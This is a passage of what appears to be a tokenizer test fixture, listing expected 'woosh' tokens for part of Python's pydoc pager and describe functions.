woosh.Token(woosh.NEWLINE, '\r\n', 1646, 8, 1647, 0),
woosh.Token(woosh.INDENT, ' ', 1647, 0, 1647, 8),
woosh.Token(woosh.NAME, 'try', 1647, 8, 1647, 11),
woosh.Token(woosh.OP, ':', 1647, 11, 1647, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1647, 12, 1648, 0),
woosh.Token(woosh.INDENT, ' ', 1648, 0, 1648, 12),
woosh.Token(woosh.NAME, 'h', 1648, 12, 1648, 13),
woosh.Token(woosh.OP, '=', 1648, 14, 1648, 15),
woosh.Token(woosh.NAME, 'int', 1648, 16, 1648, 19),
woosh.Token(woosh.OP, '(', 1648, 19, 1648, 20),
woosh.Token(woosh.NAME, 'os', 1648, 20, 1648, 22),
woosh.Token(woosh.OP, '.', 1648, 22, 1648, 23),
woosh.Token(woosh.NAME, 'environ', 1648, 23, 1648, 30),
woosh.Token(woosh.OP, '.', 1648, 30, 1648, 31),
woosh.Token(woosh.NAME, 'get', 1648, 31, 1648, 34),
woosh.Token(woosh.OP, '(', 1648, 34, 1648, 35),
woosh.Token(woosh.STRING, "'LINES'", 1648, 35, 1648, 42),
woosh.Token(woosh.OP, ',', 1648, 42, 1648, 43),
woosh.Token(woosh.NUMBER, '0', 1648, 44, 1648, 45),
woosh.Token(woosh.OP, ')', 1648, 45, 1648, 46),
woosh.Token(woosh.OP, ')', 1648, 46, 1648, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1648, 47, 1649, 0),
woosh.Token(woosh.DEDENT, ' ', 1649, 0, 1649, 8),
woosh.Token(woosh.NAME, 'except', 1649, 8, 1649, 14),
woosh.Token(woosh.NAME, 'ValueError', 1649, 15, 1649, 25),
woosh.Token(woosh.OP, ':', 1649, 25, 1649, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1649, 26, 1650, 0),
woosh.Token(woosh.INDENT, ' ', 1650, 0, 1650, 12),
woosh.Token(woosh.NAME, 'h', 1650, 12, 1650, 13),
woosh.Token(woosh.OP, '=', 1650, 14, 1650, 15),
woosh.Token(woosh.NUMBER, '0', 1650, 16, 1650, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1650, 17, 1651, 0),
woosh.Token(woosh.DEDENT, ' ', 1651, 0, 1651, 8),
woosh.Token(woosh.NAME, 'if', 1651, 8, 1651, 10),
woosh.Token(woosh.NAME, 'h', 1651, 11, 1651, 12),
woosh.Token(woosh.OP, '<=', 1651, 13, 1651, 15),
woosh.Token(woosh.NUMBER, '1', 1651, 16, 1651, 17),
woosh.Token(woosh.OP, ':', 1651, 17, 1651, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1651, 18, 1652, 0),
woosh.Token(woosh.INDENT, ' ', 1652, 0, 1652, 12),
woosh.Token(woosh.NAME, 'h', 1652, 12, 1652, 13),
woosh.Token(woosh.OP, '=', 1652, 14, 1652, 15),
woosh.Token(woosh.NUMBER, '25', 1652, 16, 1652, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1652, 18, 1653, 0),
woosh.Token(woosh.DEDENT, ' ', 1653, 0, 1653, 8),
woosh.Token(woosh.NAME, 'r', 1653, 8, 1653, 9),
woosh.Token(woosh.OP, '=', 1653, 10, 1653, 11),
woosh.Token(woosh.NAME, 'inc', 1653, 12, 1653, 15),
woosh.Token(woosh.OP, '=', 1653, 16, 1653, 17),
woosh.Token(woosh.NAME, 'h', 1653, 18, 1653, 19),
woosh.Token(woosh.OP, '-', 1653, 20, 1653, 21),
woosh.Token(woosh.NUMBER, '1', 1653, 22, 1653, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1653, 23, 1654, 0),
woosh.Token(woosh.NAME, 'sys', 1654, 8, 1654, 11),
woosh.Token(woosh.OP, '.', 1654, 11, 1654, 12),
woosh.Token(woosh.NAME, 'stdout', 1654, 12, 1654, 18),
woosh.Token(woosh.OP, '.', 1654, 18, 1654, 19),
woosh.Token(woosh.NAME, 'write', 1654, 19, 1654, 24),
woosh.Token(woosh.OP, '(', 1654, 24, 1654, 25),
woosh.Token(woosh.STRING, "'\\n'", 1654, 25, 1654, 29),
woosh.Token(woosh.OP, '.', 1654, 29, 1654, 30),
woosh.Token(woosh.NAME, 'join', 1654, 30, 1654, 34),
woosh.Token(woosh.OP, '(', 1654, 34, 1654, 35),
woosh.Token(woosh.NAME, 'lines', 1654, 35, 1654, 40),
woosh.Token(woosh.OP, '[', 1654, 40, 1654, 41),
woosh.Token(woosh.OP, ':', 1654, 41, 1654, 42),
woosh.Token(woosh.NAME, 'inc', 1654, 42, 1654, 45),
woosh.Token(woosh.OP, ']', 1654, 45, 1654, 46),
woosh.Token(woosh.OP, ')', 1654, 46, 1654, 47),
woosh.Token(woosh.OP, '+', 1654, 48, 1654, 49),
woosh.Token(woosh.STRING, "'\\n'", 1654, 50, 1654, 54),
woosh.Token(woosh.OP, ')', 1654, 54, 1654, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1654, 55, 1655, 0),
woosh.Token(woosh.NAME, 'while', 1655, 8, 1655, 13),
woosh.Token(woosh.NAME, 'lines', 1655, 14, 1655, 19),
woosh.Token(woosh.OP, '[', 1655, 19, 1655, 20),
woosh.Token(woosh.NAME, 'r', 1655, 20, 1655, 21),
woosh.Token(woosh.OP, ':', 1655, 21, 1655, 22),
woosh.Token(woosh.OP, ']', 1655, 22, 1655, 23),
woosh.Token(woosh.OP, ':', 1655, 23, 1655, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1655, 24, 1656, 0),
woosh.Token(woosh.INDENT, ' ', 1656, 0, 1656, 12),
woosh.Token(woosh.NAME, 'sys', 1656, 12, 1656, 15),
woosh.Token(woosh.OP, '.', 1656, 15, 1656, 16),
woosh.Token(woosh.NAME, 'stdout', 1656, 16, 1656, 22),
woosh.Token(woosh.OP, '.', 1656, 22, 1656, 23),
woosh.Token(woosh.NAME, 'write', 1656, 23, 1656, 28),
woosh.Token(woosh.OP, '(', 1656, 28, 1656, 29),
woosh.Token(woosh.STRING, "'-- more --'", 1656, 29, 1656, 41),
woosh.Token(woosh.OP, ')', 1656, 41, 1656, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1656, 42, 1657, 0),
woosh.Token(woosh.NAME, 'sys', 1657, 12, 1657, 15),
woosh.Token(woosh.OP, '.', 1657, 15, 1657, 16),
woosh.Token(woosh.NAME, 'stdout', 1657, 16, 1657, 22),
woosh.Token(woosh.OP, '.', 1657, 22, 1657, 23),
woosh.Token(woosh.NAME, 'flush', 1657, 23, 1657, 28),
woosh.Token(woosh.OP, '(', 1657, 28, 1657, 29),
woosh.Token(woosh.OP, ')', 1657, 29, 1657, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1657, 30, 1658, 0),
woosh.Token(woosh.NAME, 'c', 1658, 12, 1658, 13),
woosh.Token(woosh.OP, '=', 1658, 14, 1658, 15),
woosh.Token(woosh.NAME, 'getchar', 1658, 16, 1658, 23),
woosh.Token(woosh.OP, '(', 1658, 23, 1658, 24),
woosh.Token(woosh.OP, ')', 1658, 24, 1658, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1658, 25, 1659, 0),
woosh.Token(woosh.NAME, 'if', 1660, 12, 1660, 14),
woosh.Token(woosh.NAME, 'c', 1660, 15, 1660, 16),
woosh.Token(woosh.NAME, 'in', 1660, 17, 1660, 19),
woosh.Token(woosh.OP, '(', 1660, 20, 1660, 21),
woosh.Token(woosh.STRING, "'q'", 1660, 21, 1660, 24),
woosh.Token(woosh.OP, ',', 1660, 24, 1660, 25),
woosh.Token(woosh.STRING, "'Q'", 1660, 26, 1660, 29),
woosh.Token(woosh.OP, ')', 1660, 29, 1660, 30),
woosh.Token(woosh.OP, ':', 1660, 30, 1660, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1660, 31, 1661, 0),
woosh.Token(woosh.INDENT, ' ', 1661, 0, 1661, 16),
woosh.Token(woosh.NAME, 'sys', 1661, 16, 1661, 19),
woosh.Token(woosh.OP, '.', 1661, 19, 1661, 20),
woosh.Token(woosh.NAME, 'stdout', 1661, 20, 1661, 26),
woosh.Token(woosh.OP, '.', 1661, 26, 1661, 27),
woosh.Token(woosh.NAME, 'write', 1661, 27, 1661, 32),
woosh.Token(woosh.OP, '(', 1661, 32, 1661, 33),
woosh.Token(woosh.STRING, "'\\r \\r'", 1661, 33, 1661, 49),
woosh.Token(woosh.OP, ')', 1661, 49, 1661, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1661, 50, 1662, 0),
woosh.Token(woosh.NAME, 'break', 1662, 16, 1662, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1662, 21, 1663, 0),
woosh.Token(woosh.DEDENT, ' ', 1663, 0, 1663, 12),
woosh.Token(woosh.NAME, 'elif', 1663, 12, 1663, 16),
woosh.Token(woosh.NAME, 'c', 1663, 17, 1663, 18),
woosh.Token(woosh.NAME, 'in', 1663, 19, 1663, 21),
woosh.Token(woosh.OP, '(', 1663, 22, 1663, 23),
woosh.Token(woosh.STRING, "'\\r'", 1663, 23, 1663, 27),
woosh.Token(woosh.OP, ',', 1663, 27, 1663, 28),
woosh.Token(woosh.STRING, "'\\n'", 1663, 29, 1663, 33),
woosh.Token(woosh.OP, ')', 1663, 33, 1663, 34),
woosh.Token(woosh.OP, ':', 1663, 34, 1663, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1663, 35, 1664, 0),
woosh.Token(woosh.INDENT, ' ', 1664, 0, 1664, 16),
woosh.Token(woosh.NAME, 'sys', 1664, 16, 1664, 19),
woosh.Token(woosh.OP, '.', 1664, 19, 1664, 20),
woosh.Token(woosh.NAME, 'stdout', 1664, 20, 1664, 26),
woosh.Token(woosh.OP, '.', 1664, 26, 1664, 27),
woosh.Token(woosh.NAME, 'write', 1664, 27, 1664, 32),
woosh.Token(woosh.OP, '(', 1664, 32, 1664, 33),
woosh.Token(woosh.STRING, "'\\r \\r'", 1664, 33, 1664, 49),
woosh.Token(woosh.OP, '+', 1664, 50, 1664, 51),
woosh.Token(woosh.NAME, 'lines', 1664, 52, 1664, 57),
woosh.Token(woosh.OP, '[', 1664, 57, 1664, 58),
woosh.Token(woosh.NAME, 'r', 1664, 58, 1664, 59),
woosh.Token(woosh.OP, ']', 1664, 59, 1664, 60),
woosh.Token(woosh.OP, '+', 1664, 61, 1664, 62),
woosh.Token(woosh.STRING, "'\\n'", 1664, 63, 1664, 67),
woosh.Token(woosh.OP, ')', 1664, 67, 1664, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 1664, 68, 1665, 0),
woosh.Token(woosh.NAME, 'r', 1665, 16, 1665, 17),
woosh.Token(woosh.OP, '=', 1665, 18, 1665, 19),
woosh.Token(woosh.NAME, 'r', 1665, 20, 1665, 21),
woosh.Token(woosh.OP, '+', 1665, 22, 1665, 23),
woosh.Token(woosh.NUMBER, '1', 1665, 24, 1665, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1665, 25, 1666, 0),
woosh.Token(woosh.NAME, 'continue', 1666, 16, 1666, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1666, 24, 1667, 0),
woosh.Token(woosh.DEDENT, ' ', 1667, 0, 1667, 12),
woosh.Token(woosh.NAME, 'if', 1667, 12, 1667, 14),
woosh.Token(woosh.NAME, 'c', 1667, 15, 1667, 16),
woosh.Token(woosh.NAME, 'in', 1667, 17, 1667, 19),
woosh.Token(woosh.OP, '(', 1667, 20, 1667, 21),
woosh.Token(woosh.STRING, "'b'", 1667, 21, 1667, 24),
woosh.Token(woosh.OP, ',', 1667, 24, 1667, 25),
woosh.Token(woosh.STRING, "'B'", 1667, 26, 1667, 29),
woosh.Token(woosh.OP, ',', 1667, 29, 1667, 30),
woosh.Token(woosh.STRING, "'\\x1b'", 1667, 31, 1667, 37),
woosh.Token(woosh.OP, ')', 1667, 37, 1667, 38),
woosh.Token(woosh.OP, ':', 1667, 38, 1667, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1667, 39, 1668, 0),
woosh.Token(woosh.INDENT, ' ', 1668, 0, 1668, 16),
woosh.Token(woosh.NAME, 'r', 1668, 16, 1668, 17),
woosh.Token(woosh.OP, '=', 1668, 18, 1668, 19),
woosh.Token(woosh.NAME, 'r', 1668, 20, 1668, 21),
woosh.Token(woosh.OP, '-', 1668, 22, 1668, 23),
woosh.Token(woosh.NAME, 'inc', 1668, 24, 1668, 27),
woosh.Token(woosh.OP, '-', 1668, 28, 1668, 29),
woosh.Token(woosh.NAME, 'inc', 1668, 30, 1668, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1668, 33, 1669, 0),
woosh.Token(woosh.NAME, 'if', 1669, 16, 1669, 18),
woosh.Token(woosh.NAME, 'r', 1669, 19, 1669, 20),
woosh.Token(woosh.OP, '<', 1669, 21, 1669, 22),
woosh.Token(woosh.NUMBER, '0', 1669, 23, 1669, 24),
woosh.Token(woosh.OP, ':', 1669, 24, 1669, 25),
woosh.Token(woosh.NAME, 'r', 1669, 26, 1669, 27),
woosh.Token(woosh.OP, '=', 1669, 28, 1669, 29),
woosh.Token(woosh.NUMBER, '0', 1669, 30, 1669, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1669, 31, 1670, 0),
woosh.Token(woosh.DEDENT, ' ', 1670, 0, 1670, 12),
woosh.Token(woosh.NAME, 'sys', 1670, 12, 1670, 15),
woosh.Token(woosh.OP, '.', 1670, 15, 1670, 16),
woosh.Token(woosh.NAME, 'stdout', 1670, 16, 1670, 22),
woosh.Token(woosh.OP, '.', 1670, 22, 1670, 23),
woosh.Token(woosh.NAME, 'write', 1670, 23, 1670, 28),
woosh.Token(woosh.OP, '(', 1670, 28, 1670, 29),
woosh.Token(woosh.STRING, "'\\n'", 1670, 29, 1670, 33),
woosh.Token(woosh.OP, '+', 1670, 34, 1670, 35),
woosh.Token(woosh.STRING, "'\\n'", 1670, 36, 1670, 40),
woosh.Token(woosh.OP, '.', 1670, 40, 1670, 41),
woosh.Token(woosh.NAME, 'join', 1670, 41, 1670, 45),
woosh.Token(woosh.OP, '(', 1670, 45, 1670, 46),
woosh.Token(woosh.NAME, 'lines', 1670, 46, 1670, 51),
woosh.Token(woosh.OP, '[', 1670, 51, 1670, 52),
woosh.Token(woosh.NAME, 'r', 1670, 52, 1670, 53),
woosh.Token(woosh.OP, ':', 1670, 53, 1670, 54),
woosh.Token(woosh.NAME, 'r', 1670, 54, 1670, 55),
woosh.Token(woosh.OP, '+', 1670, 55, 1670, 56),
woosh.Token(woosh.NAME, 'inc', 1670, 56, 1670, 59),
woosh.Token(woosh.OP, ']', 1670, 59, 1670, 60),
woosh.Token(woosh.OP, ')', 1670, 60, 1670, 61),
woosh.Token(woosh.OP, '+', 1670, 62, 1670, 63),
woosh.Token(woosh.STRING, "'\\n'", 1670, 64, 1670, 68),
woosh.Token(woosh.OP, ')', 1670, 68, 1670, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1670, 69, 1671, 0),
woosh.Token(woosh.NAME, 'r', 1671, 12, 1671, 13),
woosh.Token(woosh.OP, '=', 1671, 14, 1671, 15),
woosh.Token(woosh.NAME, 'r', 1671, 16, 1671, 17),
woosh.Token(woosh.OP, '+', 1671, 18, 1671, 19),
woosh.Token(woosh.NAME, 'inc', 1671, 20, 1671, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1671, 23, 1672, 0),
woosh.Token(woosh.DEDENT, ' ', 1673, 0, 1673, 4),
woosh.Token(woosh.DEDENT, '', 1673, 4, 1673, 4),
woosh.Token(woosh.NAME, 'finally', 1673, 4, 1673, 11),
woosh.Token(woosh.OP, ':', 1673, 11, 1673, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1673, 12, 1674, 0),
woosh.Token(woosh.INDENT, ' ', 1674, 0, 1674, 8),
woosh.Token(woosh.NAME, 'if', 1674, 8, 1674, 10),
woosh.Token(woosh.NAME, 'tty', 1674, 11, 1674, 14),
woosh.Token(woosh.OP, ':', 1674, 14, 1674, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1674, 15, 1675, 0),
woosh.Token(woosh.INDENT, ' ', 1675, 0, 1675, 12),
woosh.Token(woosh.NAME, 'tty', 1675, 12, 1675, 15),
woosh.Token(woosh.OP, '.', 1675, 15, 1675, 16),
woosh.Token(woosh.NAME, 'tcsetattr', 1675, 16, 1675, 25),
woosh.Token(woosh.OP, '(', 1675, 25, 1675, 26),
woosh.Token(woosh.NAME, 'fd', 1675, 26, 1675, 28),
woosh.Token(woosh.OP, ',', 1675, 28, 1675, 29),
woosh.Token(woosh.NAME, 'tty', 1675, 30, 1675, 33),
woosh.Token(woosh.OP, '.', 1675, 33, 1675, 34),
woosh.Token(woosh.NAME, 'TCSAFLUSH', 1675, 34, 1675, 43),
woosh.Token(woosh.OP, ',', 1675, 43, 1675, 44),
woosh.Token(woosh.NAME, 'old', 1675, 45, 1675, 48),
woosh.Token(woosh.OP, ')', 1675, 48, 1675, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1675, 49, 1676, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.DEDENT, '', 1677, 0, 1677, 0),
woosh.Token(woosh.NAME, 'def', 1677, 0, 1677, 3),
woosh.Token(woosh.NAME, 'plainpager', 1677, 4, 1677, 14),
woosh.Token(woosh.OP, '(', 1677, 14, 1677, 15),
woosh.Token(woosh.NAME, 'text', 1677, 15, 1677, 19),
woosh.Token(woosh.OP, ')', 1677, 19, 1677, 20),
woosh.Token(woosh.OP, ':', 1677, 20, 1677, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1677, 21, 1678, 0),
woosh.Token(woosh.INDENT, ' ', 1678, 0, 1678, 4),
woosh.Token(woosh.STRING, '"""Simply print unformatted text. This is the ultimate fallback."""', 1678, 4, 1678, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1678, 72, 1679, 0),
woosh.Token(woosh.NAME, 'sys', 1679, 4, 1679, 7),
woosh.Token(woosh.OP, '.', 1679, 7, 1679, 8),
woosh.Token(woosh.NAME, 'stdout', 1679, 8, 1679, 14),
woosh.Token(woosh.OP, '.', 1679, 14, 1679, 15),
woosh.Token(woosh.NAME, 'write', 1679, 15, 1679, 20),
woosh.Token(woosh.OP, '(', 1679, 20, 1679, 21),
woosh.Token(woosh.NAME, 'plain', 1679, 21, 1679, 26),
woosh.Token(woosh.OP, '(', 1679, 26, 1679, 27),
woosh.Token(woosh.NAME, '_escape_stdout', 1679, 27, 1679, 41),
woosh.Token(woosh.OP, '(', 1679, 41, 1679, 42),
woosh.Token(woosh.NAME, 'text', 1679, 42, 1679, 46),
woosh.Token(woosh.OP, ')', 1679, 46, 1679, 47),
woosh.Token(woosh.OP, ')', 1679, 47, 1679, 48),
woosh.Token(woosh.OP, ')', 1679, 48, 1679, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1679, 49, 1680, 0),
woosh.Token(woosh.DEDENT, '', 1681, 0, 1681, 0),
woosh.Token(woosh.NAME, 'def', 1681, 0, 1681, 3),
woosh.Token(woosh.NAME, 'describe', 1681, 4, 1681, 12),
woosh.Token(woosh.OP, '(', 1681, 12, 1681, 13),
woosh.Token(woosh.NAME, 'thing', 1681, 13, 1681, 18),
woosh.Token(woosh.OP, ')', 1681, 18, 1681, 19),
woosh.Token(woosh.OP, ':', 1681, 19, 1681, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1681, 20, 1682, 0),
woosh.Token(woosh.INDENT, ' ', 1682, 0, 1682, 4),
woosh.Token(woosh.STRING, '"""Produce a short description of the given thing."""', 1682, 4, 1682, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1682, 57, 1683, 0),
woosh.Token(woosh.NAME, 'if', 1683, 4, 1683, 6),
woosh.Token(woosh.NAME, 'inspect', 1683, 7, 1683, 14),
woosh.Token(woosh.OP, '.', 1683, 14, 1683, 15),
woosh.Token(woosh.NAME, 'ismodule', 1683, 15, 1683, 23),
woosh.Token(woosh.OP, '(', 1683, 23, 1683, 24),
woosh.Token(woosh.NAME, 'thing', 1683, 24, 1683, 29),
woosh.Token(woosh.OP, ')', 1683, 29, 1683, 30),
woosh.Token(woosh.OP, ':', 1683, 30, 1683, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1683, 31, 1684, 0),
woosh.Token(woosh.INDENT, ' ', 1684, 0, 1684, 8),
woosh.Token(woosh.NAME, 'if', 1684, 8, 1684, 10),
woosh.Token(woosh.NAME, 'thing', 1684, 11, 1684, 16),
woosh.Token(woosh.OP, '.', 1684, 16, 1684, 17),
woosh.Token(woosh.NAME, '__name__', 1684, 17, 1684, 25),
woosh.Token(woosh.NAME, 'in', 1684, 26, 1684, 28),
woosh.Token(woosh.NAME, 'sys', 1684, 29, 1684, 32),
woosh.Token(woosh.OP, '.', 1684, 32, 1684, 33),
woosh.Token(woosh.NAME, 'builtin_module_names', 1684, 33, 1684, 53),
woosh.Token(woosh.OP, ':', 1684, 53, 1684, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1684, 54, 1685, 0),
woosh.Token(woosh.INDENT, ' ', 1685, 0, 1685, 12),
woosh.Token(woosh.NAME, 'return', 1685, 12, 1685, 18),
woosh.Token(woosh.STRING, "'built-in module '", 1685, 19, 1685, 37),
woosh.Token(woosh.OP, '+', 1685, 38, 1685, 39),
woosh.Token(woosh.NAME, 'thing', 1685, 40, 1685, 45),
woosh.Token(woosh.OP, '.', 1685, 45, 1685, 46),
woosh.Token(woosh.NAME, '__name__', 1685, 46, 1685, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1685, 54, 1686, 0),
woosh.Token(woosh.DEDENT, ' ', 1686, 0, 1686, 8),
woosh.Token(woosh.NAME, 'if', 1686, 8, 1686, 10),
woosh.Token(woosh.NAME, 'hasattr', 1686, 11, 1686, 18),
woosh.Token(woosh.OP, '(', 1686, 18, 1686, 19),
woosh.Token(woosh.NAME, 'thing', 1686, 19, 1686, 24),
woosh.Token(woosh.OP, ',', 1686, 24, 1686, 25),
woosh.Token(woosh.STRING, "'__path__'", 1686, 26, 1686, 36),
woosh.Token(woosh.OP, ')', 1686, 36, 1686, 37),
woosh.Token(woosh.OP, ':', 1686, 37, 1686, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1686, 38, 1687, 0),
woosh.Token(woosh.INDENT, ' ', 1687, 0, 1687, 12),
woosh.Token(woosh.NAME, 'return', 1687, 12, 1687, 18),
woosh.Token(woosh.STRING, "'package '", 1687, 19, 1687, 29),
woosh.Token(woosh.OP, '+', 1687, 30, 1687, 31),
woosh.Token(woosh.NAME, 'thing', 1687, 32, 1687, 37),
woosh.Token(woosh.OP, '.', 1687, 37, 1687, 38),
woosh.Token(woosh.NAME, '__name__', 1687, 38, 1687, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 1687, 46, 1688, 0),
woosh.Token(woosh.DEDENT, ' ', 1688, 0, 1688, 8),
woosh.Token(woosh.NAME, 'else', 1688, 8, 1688, 12),
woosh.Token(woosh.OP, ':', 1688, 12, 1688, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1688, 13, 1689, 0),
woosh.Token(woosh.INDENT, ' ', 1689, 0, 1689, 12),
woosh.Token(woosh.NAME, 'return', 1689, 12, 1689, 18),
woosh.Token(woosh.STRING, "'module '", 1689, 19, 1689, 28),
woosh.Token(woosh.OP, '+', 1689, 29, 1689, 30),
woosh.Token(woosh.NAME, 'thing', 1689, 31, 1689, 36),
woosh.Token(woosh.OP, '.', 1689, 36, 1689, 37),
woosh.Token(woosh.NAME, '__name__', 1689, 37, 1689, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1689, 45, 1690, 0),
woosh.Token(woosh.DEDENT, ' ', 1690, 0, 1690, 4),
woosh.Token(woosh.DEDENT, '', 1690, 4, 1690, 4),
woosh.Token(woosh.NAME, 'if', 1690, 4, 1690, 6),
woosh.Token(woosh.NAME, 'inspect', 1690, 7, 1690, 14),
woosh.Token(woosh.OP, '.', 1690, 14, 1690, 15),
woosh.Token(woosh.NAME, 'isbuiltin', 1690, 15, 1690, 24),
woosh.Token(woosh.OP, '(', 1690, 24, 1690, 25),
woosh.Token(woosh.NAME, 'thing', 1690, 25, 1690, 30),
woosh.Token(woosh.OP, ')', 1690, 30, 1690, 31),
woosh.Token(woosh.OP, ':', 1690, 31, 1690, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1690, 32, 1691, 0),
woosh.Token(woosh.INDENT, ' ', 1691, 0, 1691, 8),
woosh.Token(woosh.NAME, 'return', 1691, 8, 1691, 14),
woosh.Token(woosh.STRING, "'built-in function '", 1691, 15, 1691, 35),
woosh.Token(woosh.OP, '+', 1691, 36, 1691, 37),
woosh.Token(woosh.NAME, 'thing', 1691, 38, 1691, 43),
woosh.Token(woosh.OP, '.', 1691, 43, 1691, 44),
woosh.Token(woosh.NAME, '__name__', 1691, 44, 1691, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1691, 52, 1692, 0),
woosh.Token(woosh.DEDENT, ' ', 1692, 0, 1692, 4),
woosh.Token(woosh.NAME, 'if', 1692, 4, 1692, 6),
woosh.Token(woosh.NAME, 'inspect', 1692, 7, 1692, 14),
woosh.Token(woosh.OP, '.', 1692, 14, 1692, 15),
woosh.Token(woosh.NAME, 'isgetsetdescriptor', 1692, 15, 1692, 33),
woosh.Token(woosh.OP, '(', 1692, 33, 1692, 34),
woosh.Token(woosh.NAME, 'thing', 1692, 34, 1692, 39),
woosh.Token(woosh.OP, ')', 1692, 39, 1692, 40),
woosh.Token(woosh.OP, ':', 1692, 40, 1692, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1692, 41, 1693, 0),
woosh.Token(woosh.INDENT, ' ', 1693, 0, 1693, 8),
woosh.Token(woosh.NAME, 'return', 1693, 8, 1693, 14),
woosh.Token(woosh.STRING, "'getset descriptor %s.%s.%s'", 1693, 15, 1693, 43),
woosh.Token(woosh.OP, '%', 1693, 44, 1693, 45),
woosh.Token(woosh.OP, '(', 1693, 46, 1693, 47),
woosh.Token(woosh.NAME, 'thing', 1694, 12, 1694, 17),
woosh.Token(woosh.OP, '.', 1694, 17, 1694, 18),
woosh.Token(woosh.NAME, '__objclass__', 1694, 18, 1694, 30),
woosh.Token(woosh.OP, '.', 1694, 30, 1694, 31),
woosh.Token(woosh.NAME, '__module__', 1694, 31, 1694, 41),
woosh.Token(woosh.OP, ',', 1694, 41, 1694, 42),
woosh.Token(woosh.NAME, 'thing', 1694, 43, 1694, 48),
woosh.Token(woosh.OP, '.', 1694, 48, 1694, 49),
woosh.Token(woosh.NAME, '__objclass__', 1694, 49, 1694, 61),
woosh.Token(woosh.OP, '.', 1694, 61, 1694, 62),
woosh.Token(woosh.NAME, '__name__', 1694, 62, 1694, 70),
woosh.Token(woosh.OP, ',', 1694, 70, 1694, 71),
woosh.Token(woosh.NAME, 'thing', 1695, 12, 1695, 17),
woosh.Token(woosh.OP, '.', 1695, 17, 1695, 18),
woosh.Token(woosh.NAME, '__name__', 1695, 18, 1695, 26),
woosh.Token(woosh.OP, ')', 1695, 26, 1695, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1695, 27, 1696, 0),
woosh.Token(woosh.DEDENT, ' ', 1696, 0, 1696, 4),
woosh.Token(woosh.NAME, 'if', 1696, 4, 1696, 6),
woosh.Token(woosh.NAME, 'inspect', 1696, 7, 1696, 14),
woosh.Token(woosh.OP, '.', 1696, 14, 1696, 15),
woosh.Token(woosh.NAME, 'ismemberdescriptor', 1696, 15, 1696, 33),
woosh.Token(woosh.OP, '(', 1696, 33, 1696, 34),
woosh.Token(woosh.NAME, 'thing', 1696, 34, 1696, 39),
woosh.Token(woosh.OP, ')', 1696, 39, 1696, 40),
woosh.Token(woosh.OP, ':', 1696, 40, 1696, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1696, 41, 1697, 0),
woosh.Token(woosh.INDENT, ' ', 1697, 0, 1697, 8),
woosh.Token(woosh.NAME, 'return', 1697, 8, 1697, 14),
woosh.Token(woosh.STRING, "'member descriptor %s.%s.%s'", 1697, 15, 1697, 43),
woosh.Token(woosh.OP, '%', 1697, 44, 1697, 45),
woosh.Token(woosh.OP, '(', 1697, 46, 1697, 47),
woosh.Token(woosh.NAME, 'thing', 1698, 12, 1698, 17),
woosh.Token(woosh.OP, '.', 1698, 17, 1698, 18),
woosh.Token(woosh.NAME, '__objclass__', 1698, 18, 1698, 30),
woosh.Token(woosh.OP, '.', 1698, 30, 1698, 31),
woosh.Token(woosh.NAME, '__module__', 1698, 31, 1698, 41),
woosh.Token(woosh.OP, ',', 1698, 41, 1698, 42),
woosh.Token(woosh.NAME, 'thing', 1698, 43, 1698, 48),
woosh.Token(woosh.OP, '.', 1698, 48, 1698, 49),
woosh.Token(woosh.NAME, '__objclass__', 1698, 49, 1698, 61),
woosh.Token(woosh.OP, '.', 1698, 61, 1698, 62),
woosh.Token(woosh.NAME, '__name__', 1698, 62, 1698, 70),
woosh.Token(woosh.OP, ',', 1698, 70, 1698, 71),
woosh.Token(woosh.NAME, 'thing', 1699, 12, 1699, 17),
woosh.Token(woosh.OP, '.', 1699, 17, 1699, 18),
woosh.Token(woosh.NAME, '__name__', 1699, 18, 1699, 26),
woosh.Token(woosh.OP, ')', 1699, 26, 1699, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1699, 27, 1700, 0),
woosh.Token(woosh.DEDENT, ' ', 1700, 0, 1700, 4),
woosh.Token(woosh.NAME, 'if', 1700, 4, 1700, 6),
woosh.Token(woosh.NAME, 'inspect', 1700, 7, 1700, 14),
woosh.Token(woosh.OP, '.', 1700, 14, 1700, 15),
